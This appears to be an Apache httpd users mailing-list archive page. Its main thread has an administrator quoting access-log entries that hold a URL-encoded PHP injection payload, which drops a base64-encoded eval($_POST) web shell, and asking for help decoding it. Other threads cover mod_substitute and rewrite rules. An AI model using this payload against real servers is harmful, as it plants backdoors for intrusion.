> > 91.200.12.33 - - [06/Feb/2017:16:44:33 +0100] 253 "GET
> > /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%
> 40set_time_limit%280%29%3B%40set_magic_quotes_runtime%
> 280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUME
> > NT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%
> 27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B
> > HTTP/1.1" 200 90
> >
> > What upsets me is that these two requests have statuscode 200, which
> mean it was
> > successfull.
> > The IP is from ukraine. Where can i find out what these %charcacters
> mean ? Does
> > anyone understand what happened here ? It's apache 2.2.3 64bit.
> >
> > Thanks for any hint.
> >
> > Bernd
> >
>
> What i find out already:
> https://url-encoder.de/ helped me to decode the URL:
> /?1=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo
> '->|';file_put_contents($_SERVER['DOCUME
> NT_ROOT'].'/webconfig.txt.php',base64_decode('
> PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+'));echo '|<-';
>
> Currently i don't understand what this means.
> I don't find a file webconfig.txt.php on my system.
> Currently no weird process, no new user in /etc/passwd, no packtes to the
> network which includes this ip.
>
> Thankful for any tip.
>
>
> Bernd
>
>
> Helmholtz Zentrum Muenchen
> Deutsches Forschungszentrum fuer Gesundheit und Umwelt (GmbH)
> Ingolstaedter Landstr. 1
> 85764 Neuherberg
> www.helmholtz-muenchen.de
> Aufsichtsratsvorsitzende: MinDir'in Baerbel Brumme-Bothe
> Geschaeftsfuehrer: Prof. Dr. Guenther Wess, Heinrich Bassler, Dr. Alfons
> Enhsen
> Registergericht: Amtsgericht Muenchen HRB 6466
> USt-IdNr: DE 129521671
>
>
> -
> To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
> For additional commands, e-mail: users-h...@httpd.apache.org
>
>


-- 
*Daniel Ferradal*
IT Specialist

email dferradal at gmail.com
linkedin es.linkedin.com/in/danielferradal

Re: [users@httpd] am i hacked ?

[Lentes, Bernd]

- On Feb 6, 2017, at 5:14 PM, Bernd Lentes 
bernd.len...@helmholtz-muenchen.de wrote:

> Hi,
> 
> just in the moment i found two very weird entries in may access_log:
> 
> 91.200.12.33 - - [06/Feb/2017:16:43:26 +0100] 236 "GET
> /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUME
> NT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B
> HTTP/1.1" 200 90
> 91.200.12.33 - - [06/Feb/2017:16:44:33 +0100] 253 "GET
> /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUME
> NT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B
> HTTP/1.1" 200 90
> 
> What upsets me is that these two requests have statuscode 200, which mean it 
> was
> successfull.
> The IP is from ukraine. Where can i find out what these %charcacters mean ? 
> Does
> anyone understand what happened here ? It's apache 2.2.3 64bit.
> 
> Thanks for any hint.
> 
> Bernd
> 

What i find out already:
https://url-encoder.de/ helped me to decode the URL:
/?1=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo
 '->|';file_put_contents($_SERVER['DOCUME
NT_ROOT'].'/webconfig.txt.php',base64_decode('PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+'));echo
 '|<-';

Currently i don't understand what this means.
I don't find a file webconfig.txt.php on my system.
Currently no weird process, no new user in /etc/passwd, no packtes to the 
network which includes this ip.

Thankful for any tip.


Bernd
 

Helmholtz Zentrum Muenchen
Deutsches Forschungszentrum fuer Gesundheit und Umwelt (GmbH)
Ingolstaedter Landstr. 1
85764 Neuherberg
www.helmholtz-muenchen.de
Aufsichtsratsvorsitzende: MinDir'in Baerbel Brumme-Bothe
Geschaeftsfuehrer: Prof. Dr. Guenther Wess, Heinrich Bassler, Dr. Alfons Enhsen
Registergericht: Amtsgericht Muenchen HRB 6466
USt-IdNr: DE 129521671


-
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

Re: [users@httpd] am i hacked ?

[Jack Swan]

I didn't decode it all.  I'll leave the rest up to you, but the %characters are 
hexadecimal characters.  Look up hex charset.  

So the first line translates to (I may have missed a char or two...)

GET/?1=@ini_set("display_errors", 
0);set_time_limit("0");@set_magic_quotes_runtime();echo  
'->|';file_put_contents($_SERVER['DOCUMENT_ROOT'].'/webconfig.txt.php',base64_decode('PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+'));echo
 '|<-';


- Original Message -
From: bernd.len...@helmholtz-muenchen.de
To: users@httpd.apache.org
Sent: Monday, February 6, 2017 11:15:04 AM GMT -05:00 US/Canada Eastern
Subject: [users@httpd] am i hacked ?

Hi,

just in the moment i found two very weird entries in may access_log:

91.200.12.33 - - [06/Feb/2017:16:43:26 +0100] 236 "GET 
/?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUME
NT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B
 HTTP/1.1" 200 90
91.200.12.33 - - [06/Feb/2017:16:44:33 +0100] 253 "GET 
/?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUME
NT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B
 HTTP/1.1" 200 90

What upsets me is that these two requests have statuscode 200, which mean it 
was successfull.
The IP is from ukraine. Where can i find out what these %charcacters mean ? 
Does anyone understand what happened here ? It's apache 2.2.3 64bit.

Thanks for any hint.

Bernd

-- 
Bernd Lentes 

Systemadministration 
institute of developmental genetics 
Gebäude 35.34 - Raum 208 
HelmholtzZentrum München 
bernd.len...@helmholtz-muenchen.de 
phone: +49 (0)89 3187 1241 
fax: +49 (0)89 3187 2294 

Erst wenn man sich auf etwas festlegt kann man Unrecht haben 
Scott Adams


Helmholtz Zentrum Muenchen
Deutsches Forschungszentrum fuer Gesundheit und Umwelt (GmbH)
Ingolstaedter Landstr. 1
85764 Neuherberg
www.helmholtz-muenchen.de
Aufsichtsratsvorsitzende: MinDir'in Baerbel Brumme-Bothe
Geschaeftsfuehrer: Prof. Dr. Guenther Wess, Heinrich Bassler, Dr. Alfons Enhsen
Registergericht: Amtsgericht Muenchen HRB 6466
USt-IdNr: DE 129521671


-
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org


-
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

[users@httpd] mod_substitute only replaces first pattern match

[Uwe.Poliak]

Hi,

I am trying a reverse proxy server based on apache httpd v2.4 on the most 
recent release of CentOS:

# httpd -version
Server version: Apache/2.4.6 (CentOS)
Server built:   Nov 14 2016 18:04:44

# uname -a
Linux hostname.domain.tld 3.10.0-514.6.1.el7.x86_64 #1 SMP Wed Jan 18 13:06:36 
UTC 2017 x86_64 x86_64 x86_64 GNU/Linux

# cat /etc/centos-release
CentOS Linux release 7.3.1611 (Core)

Within this configuration I have to use mod_substitute to rewrite URLs from 
some applications.
For this I am using mod_filter with the SUBSTITUTE Filter as follows:

  ProxyRequests Off
  ProxyPass /my-location https://my-server.domain.tld/

  
ProxyPassReverse/my-location

FilterDeclare   AGFILTER

FilterProvider  AGFILTER SUBSTITUTE "%{resp:Content-Type} =~ 
m#^text/html#"
FilterProvider  AGFILTER SUBSTITUTE "%{resp:Content-Type} =~ m#.*/css#"
FilterProvider  AGFILTER SUBSTITUTE "%{resp:Content-Type} =~ m#.*/json#"
FilterProvider  AGFILTER SUBSTITUTE "%{resp:Content-Type} =~ 
m#.*/javascript#"

FilterChain AGFILTER

Substitute  
"s#/(css|js|images|management|system|help)/(.*)#/my-location/$1/$2#fi"
  

It works fine if there is only one occurrence of the search pattern in a line 
in the html code. This occurrence will be replaced properly.
However, if there are two or more occurrences of the search pattern in one html 
line, only the first one is replaced. It looks like this example:

  

[users@httpd] am i hacked ?

[Lentes, Bernd]

Hi,

just in the moment i found two very weird entries in may access_log:

91.200.12.33 - - [06/Feb/2017:16:43:26 +0100] 236 "GET 
/?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUME
NT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B
 HTTP/1.1" 200 90
91.200.12.33 - - [06/Feb/2017:16:44:33 +0100] 253 "GET 
/?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUME
NT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B
 HTTP/1.1" 200 90

What upsets me is that these two requests have statuscode 200, which mean it 
was successfull.
The IP is from ukraine. Where can i find out what these %charcacters mean ? 
Does anyone understand what happened here ? It's apache 2.2.3 64bit.

Thanks for any hint.

Bernd

-- 
Bernd Lentes 

Systemadministration 
institute of developmental genetics 
Gebäude 35.34 - Raum 208 
HelmholtzZentrum München 
bernd.len...@helmholtz-muenchen.de 
phone: +49 (0)89 3187 1241 
fax: +49 (0)89 3187 2294 

Erst wenn man sich auf etwas festlegt kann man Unrecht haben 
Scott Adams


Helmholtz Zentrum Muenchen
Deutsches Forschungszentrum fuer Gesundheit und Umwelt (GmbH)
Ingolstaedter Landstr. 1
85764 Neuherberg
www.helmholtz-muenchen.de
Aufsichtsratsvorsitzende: MinDir'in Baerbel Brumme-Bothe
Geschaeftsfuehrer: Prof. Dr. Guenther Wess, Heinrich Bassler, Dr. Alfons Enhsen
Registergericht: Amtsgericht Muenchen HRB 6466
USt-IdNr: DE 129521671


-
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

Re: [users@httpd] .htaccess rule match keyword

[Yann Ylavic]

Hi,

On Mon, Feb 6, 2017 at 11:34 AM, Rajib Karmakar
 wrote:
>
> RewriteRule ^cart(.*)$ cart.php
>
> https://www.berkshirefurniture.com/cart/
[]
>
> https://www.berkshirefurniture.com/carter-upholstered-bed/p/bmV3LWFycml2YWw=
>
> ## For showing leaf sub category of item
> RewriteCond %{REQUEST_URI} !^/([^/]*)/p
> RewriteCond %{REQUEST_FILENAME} !-f
> RewriteCond %{REQUEST_FILENAME} !-d
> RewriteRule ^([^/]*)/([^/]*)/([^/]*)$
> leafsub-category-gallery.php?slug=$1&subcat=$2&leafsubcat=$3 [L,NC]
>
> First four letter of products url "carter" to "cart" matched with the cart
> page link and that's the reason it moved to the cart page.
>
> Is it possible using htaccess rewriting match the specific slug and forced
> not to redirect it's default rules i.e it matched the full slug and redirect
> to specific rule only.

Not sure what you mean, but as already suggested, why not avoid
matching anything but /cart or /cart/.* in the first place:
RewriteRule ^cart(/|$) cart.php
?

And shouldn't the same principle also apply to the first RewriteCond:
   RewriteCond %{REQUEST_URI} !^/([^/]*)/p/
?


Regards,
Yann.

-
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

[users@httpd] .htaccess rule match keyword

[Rajib Karmakar]

Hi,

RewriteRule ^cart(.*)$ cart.php

https://www.berkshirefurniture.com/cart/




https://www.berkshirefurniture.com/carter-upholstered-bed/p/bmV3LWFycml2YWw=

## For showing leaf sub category of item
RewriteCond %{REQUEST_URI} !^/([^/]*)/p
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule ^([^/]*)/([^/]*)/([^/]*)$ leafsub-category-gallery.php?
slug=$1&subcat=$2&leafsubcat=$3 [L,NC]



First four letter of products url "carter" to "cart" matched with the cart
page link and that's the reason it moved to the cart page.


Is it possible using htaccess rewriting match the specific slug and forced
not to redirect it's default rules i.e it matched the full slug and
redirect to specific rule only.

Sincerely
-
Rajib Karmakar

Creative Web Logo Technologies
Website: http://www.creativeweblogo.com
Mobile: +919874704940
Skype: creative.web.logo
© 2008-2017 Creative Web Logo Technologies.